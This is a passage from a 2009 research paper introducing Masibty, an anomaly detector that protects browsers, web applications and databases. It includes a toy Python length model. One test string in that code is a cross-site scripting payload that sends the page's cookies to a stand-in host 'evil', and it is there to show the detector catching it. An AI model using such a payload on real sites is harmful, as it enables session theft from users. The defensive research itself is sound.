Integrated Detection of Attacks Against Browsers, Web Applications and Databases

C. Criscione, G. Salvaneschi, F. Maggi, S. Zanero
Dipartimento di Elettronica e Informazione — Politecnico di Milano

Abstract—Anomaly-based techniques have been exploited successfully to implement protection mechanisms for various systems. Recently, these approaches have been ported to the web domain under the name of "web application anomaly detectors" (or firewalls), with promising results. In particular, those capable of automatically building specifications, or models, of the protected application by observing its traffic (e.g., network packets, system calls, or HTTP requests and responses) are especially interesting, since they can be deployed with little effort.

Typically, the detection accuracy of these systems is significantly influenced by the model building phase (often called training), which clearly depends upon the quality of the observed traffic: it should resemble the normal activity of the protected application and must also be free from attacks. Otherwise, detection may result in significant amounts of false positives (i.e., benign events flagged as anomalous) and false negatives (i.e., undetected threats).

In this work we describe Masibty, a web application anomaly detector that has some interesting properties. First, it does not require the training data to be attack-free. Second, it not only protects the monitored application, but also detects and blocks malicious client-side threats before they are sent to the browser. Third, Masibty intercepts queries before they are sent to the database, correlates them with the corresponding HTTP requests, and blocks those deemed anomalous. Both the accuracy and the performance have been evaluated on real-world web applications, with interesting results.
The system is almost unaffected by the presence of attacks in the training data and shows only a negligible amount of false positives, although this is paid for in terms of a slight performance overhead.

I. INTRODUCTION

In the field of computer security, the protection of web applications against attacks is without doubt a critical and current research issue. Web applications are gaining more and more popularity, due to their ease of use and development and to the ubiquity of the Internet — and in particular, the Web — in everyday life [1]. At the same time, they are usually developed with less attention to security constraints, due to the different development models being employed; as a result, they have become the prime source of vulnerabilities in enterprise information systems. During 2006, the Web Application Security Consortium reported 148,029 different vulnerabilities affecting web applications: this translates to roughly 85% of the audited applications having at least one vulnerability [2]. Similarly, Symantec reported a 125% increase in web application vulnerabilities between 2007 and 2008 [3].

Various taxonomies have been proposed for web threats, such as [4], [5], [6]. SQL injection seems to be the most commonly exploited attack vector. The goal of such attacks is usually either to control the server or to obtain sensitive data. However, the current trend in web application attacks is the ever-increasing rate of attacks carried out to compromise a host and use it for the distribution of malware (e.g., spyware, bots) or to deploy a phishing or spamming kit [7]. This does not come as a surprise, considering that PhishTank.com, for example, reports about 130,000 confirmed phishing websites over the same year. This shows how prevalent client-side attacks, such as the very common cross-site scripting, are becoming.
This creates a need for protection mechanisms that prevent malicious content from being deployed on a host that runs a vulnerable web application. In addition, such a mechanism should avoid further spreading of the malicious content by protecting the visitors of a site that has already been compromised. In this scenario, the challenge is that attacks are often brought not against known, off-the-shelf targets, but against custom applications. As such, they are by any definition zero-day attacks (i.e., attacks that exploit vulnerabilities unknown before their use). This renders substantially ineffective the traditional and well-developed concept of misuse detection, which is based on the exhaustive enumeration of all known threats. On the other hand, anomaly-based techniques have the desirable property of protecting also against totally novel attacks. In fact, they model the normal behavior of the protected system (e.g., a web application) and detect deviations, called anomalies, under the assumption that attacks always cause anomalies. In this context, the term "normal behavior" typically refers to the set of features (e.g., the frequency of certain bytes in a network packet, the length of a string variable) extracted from the traffic, which are then combined so as to build the models exploited to recognize anomalies (e.g., unexpected byte frequencies, an out-of-bounds string length).

In this work, we describe Masibty, a web application anomaly detector that attempts to mitigate the two aforementioned major drawbacks (i.e., false positives due to inaccurate models and false negatives due to the presence of attacks in the training data). Masibty is able to detect real-world threats against the clients (e.g., malicious JavaScript code trying to exploit browser vulnerabilities), the application (e.g., cross-site scripting, permanent content injection), and the database layer (e.g., SQL injection).
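To make the notion of a feature model concrete, the following is a minimal sketch of an anomaly model built on a single feature, the length of an HTTP parameter value. It learns the lengths observed during training and flags values that deviate too far from them. All names and the deviation threshold are illustrative assumptions of ours; this is not Masibty's actual implementation.

```python
import math

class LengthModel:
    """Toy anomaly model over one feature: the length of a string value."""

    def __init__(self):
        self.samples = []

    def train(self, value):
        # During training, record the length of each observed value.
        self.samples.append(len(value))

    def is_anomalous(self, value, k=3.0):
        # Flag values whose length deviates more than k standard
        # deviations from the lengths seen during training.
        n = len(self.samples)
        mean = sum(self.samples) / n
        variance = sum((s - mean) ** 2 for s in self.samples) / n
        std = math.sqrt(variance)
        # Floor the deviation at 1 so near-constant training data
        # does not flag every slightly different value.
        return abs(len(value) - mean) > k * max(std, 1.0)

model = LengthModel()
for username in ["alice", "bob", "charlie", "dave"]:
    model.train(username)

# A benign value of comparable length is accepted...
assert not model.is_anomalous("eve")
# ...while an injected script payload is far longer and gets flagged.
payload = "<script>document.location='http://evil/'+document.cookie</script>"
assert model.is_anomalous(payload)
```

A real detector would maintain many such models per parameter (character distributions, token sets, and so on) and aggregate their scores; a single robust model like this one merely illustrates the training/detection split described above.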
A prototype of Masibty is evaluated on a set of real-world attacks against publicly available applications, using both plain and mutated versions of the exploits, in order to assess the resilience to evasion. We can identify three key improvements in this paper:

2009 European Conference on Computer Network Defense. 978-0-7695-3983-6/09 © 2009 IEEE. DOI 10.1109/EC2ND.2009.13